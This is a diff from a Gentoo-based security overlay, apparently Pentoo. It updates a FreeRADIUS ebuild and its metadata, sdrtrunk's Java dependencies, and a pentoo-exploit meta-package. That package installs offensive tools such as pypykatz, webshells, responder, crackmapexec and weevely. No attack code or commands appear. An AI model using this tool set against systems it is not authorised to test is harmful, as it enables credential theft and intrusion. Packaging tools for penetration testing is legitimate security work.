--with-docdir=/usr/share/doc/${PF}
--with-logdir=/var/log/radius
$(use_enable debug developer)
$(use_with ldap edir)
$(use_with redis rlm_cache_redis)
$(use_with redis rlm_redis)
$(use_with redis rlm_rediswho)
$(use_with ssl openssl)
$(use_with systemd systemd)
)
# bug #77613
if has_version app-crypt/heimdal ; then
myeconfargs+=( --enable-heimdal-krb5 )
fi
if use python ; then
myeconfargs+=(
--with-rlm-python3-bin=${EPYTHON}
--with-rlm-python3-config-bin=${EPYTHON}-config
)
fi
if ! use readline ; then
export ac_cv_lib_readline=no
fi
#if ! use pcap ; then
# export ac_cv_lib_pcap_pcap_open_live=no
# export ac_cv_header_pcap_h=no
#fi
econf "${myeconfargs[@]}"
}
src_compile() {
# Verbose, do not generate certificates
emake \
Q='' ECHO=true \
LOCAL_CERT_PRODUCTS=''
}
src_install() {
dodir /etc
diropts -m0750 -o root -g radius
dodir /etc/raddb
diropts -m0750 -o radius -g radius
dodir /var/log/radius
keepdir /var/log/radius/radacct
diropts
# - Verbose, do not install certificates
# - Parallel install fails (bug #509498)
emake -j1 \
Q='' ECHO=true \
LOCAL_CERT_PRODUCTS='' \
R="${D}" \
install
if use pam ; then
pamd_mimic_system radiusd auth account password session
fi
# bug #711756
fowners -R radius:radius /etc/raddb
fowners -R radius:radius /var/log/radius
dodoc CREDITS
rm "${ED}"/usr/sbin/rc.radiusd || die
newinitd "${FILESDIR}"/radius.init-r4 radiusd
newconfd "${FILESDIR}"/radius.conf-r6 radiusd
if ! use systemd ; then
# If systemd builtin is not enabled we need use Type=Simple
# as systemd .service
sed -i -e 's:^Type=.*::g' \
-e 's:^WatchdogSec=.*::g' -e 's:^NotifyAccess=all.*::g' \
"${S}"/debian/freeradius.service
fi
systemd_dounit "${S}"/debian/freeradius.service
find "${ED}" \( -name "*.a" -o -name "*.la" \) -delete || die
}
pkg_config() {
if use ssl ; then
cd "${ROOT}"/etc/raddb/certs || die
./bootstrap || die "Error while running ./bootstrap script."
chown root:radius "${ROOT}"/etc/raddb/certs || die
chown root:radius "${ROOT}"/etc/raddb/certs/ca.pem || die
chown root:radius "${ROOT}"/etc/raddb/certs/server.{key,crt,pem} || die
fi
}
pkg_preinst() {
if ! has_version ${CATEGORY}/${PN} && use ssl ; then
elog "You have to run \`emerge --config =${CATEGORY}/${PF}\` to be able"
elog "to start the radiusd service."
fi
}

22
net-dialup/freeradius/metadata.xml
View file

@ -1,22 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pkgmetadata SYSTEM "https://www.gentoo.org/dtd/metadata.dtd">
<pkgmetadata>
<!-- maintainer-needed -->
<use>
<flag name="memcached">
Include <pkg>dev-libs/libmemcached</pkg> in caching drivers
</flag>
<flag name="redis">
Include support for Redis database
</flag>
<flag name="mongodb">
Include support for MongoDB database
</flag>
<flag name="wpe">
Include support for WPE hacking
</flag>
</use>
<upstream>
<remote-id type="github">FreeRADIUS/freeradius-server</remote-id>
</upstream>
</pkgmetadata>

7
net-wireless/sdrtrunk/sdrtrunk-9999.ebuild
View file

@ -1,4 +1,4 @@
# Copyright 1999-2024 Gentoo Authors # Copyright 1999-2025 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2 # Distributed under the terms of the GNU General Public License v2
EAPI=8 EAPI=8
@ -22,9 +22,10 @@ SLOT="0"
# FIXME: missing deps: # FIXME: missing deps:
# JDK/JavaFX 23 or JavaFX 24 # JDK/JavaFX 23 or JavaFX 24
RDEPEND="virtual/jdk:24 RDEPEND="
!net-wireless/sdrtrunk-bin !net-wireless/sdrtrunk-bin
dev-java/openjdk:24[alsa] virtual/jdk:21
dev-java/openjdk:21[alsa]
media-libs/alsa-lib media-libs/alsa-lib
media-libs/freetype media-libs/freetype
media-libs/giflib:= media-libs/giflib:=

9
pentoo/pentoo-exploit/pentoo-exploit-2024.1.ebuild → pentoo/pentoo-exploit/pentoo-exploit-2025.0.ebuild
View file

@ -1,4 +1,4 @@
# Copyright 1999-2024 Gentoo Authors # Copyright 1999-2025 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2 # Distributed under the terms of the GNU General Public License v2
EAPI=8 EAPI=8
@ -12,14 +12,13 @@ KEYWORDS="~amd64 ~x86"
IUSE="pentoo-extra pentoo-full" IUSE="pentoo-extra pentoo-full"
PDEPEND=" PDEPEND="
amd64? ( app-exploits/empire )
app-exploits/pypykatz app-exploits/pypykatz
app-exploits/webshells app-exploits/webshells
net-analyzer/responder net-analyzer/responder
dev-util/pwntools dev-util/pwntools
pentoo-full? ( pentoo-full? (
amd64? ( app-exploits/deathstar amd64? (
net-analyzer/crackmapexec ) net-analyzer/crackmapexec )
app-exploits/weevely app-exploits/weevely
app-forensics/make-pdf app-forensics/make-pdf
@ -35,3 +34,7 @@ PDEPEND="
# the 9999 svn version takes really long time to install. Removing it, until there is a better way to do it # the 9999 svn version takes really long time to install. Removing it, until there is a better way to do it
#app-exploits/exploitdb #app-exploits/exploitdb
# Removed because of unsatisfied deps
#amd64? ( app-exploits/empire )
#amd64? ( app-exploits/deathstar